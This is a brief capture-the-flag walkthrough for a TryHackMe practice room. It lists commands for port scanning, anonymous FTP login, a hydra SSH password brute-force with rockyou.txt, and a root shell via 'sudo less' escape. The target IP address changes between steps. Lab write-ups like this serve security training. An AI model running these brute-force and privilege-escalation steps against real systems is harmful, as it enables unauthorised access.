Link: https://tryhackme.com/room/brooklynninenine
#1 “User flag“
Use nmap to find open ports:
nmap -sCV 10.10.214.116
Port 21 is open and anonymous ftp login is allowed. So we connect to ftp:
ftp 10.10.214.116
with:
username: anonymous
password: anonymous
And we found a text file.
So we have the username “jake
“.
We can use hydra with rockyou.txt to find the password.
hydra -l jake -P rockyou.txt 10.10.11.109 ssh
Then connect to jake
‘s ssh
with the password we found.
ssh jake@10.10.11.109
And we can get the flag in /home/holt
:
#2 “Root flag“
See what we can do with:
sudo -l
And get root
with:
sudo less /etc/profile
!/bin/sh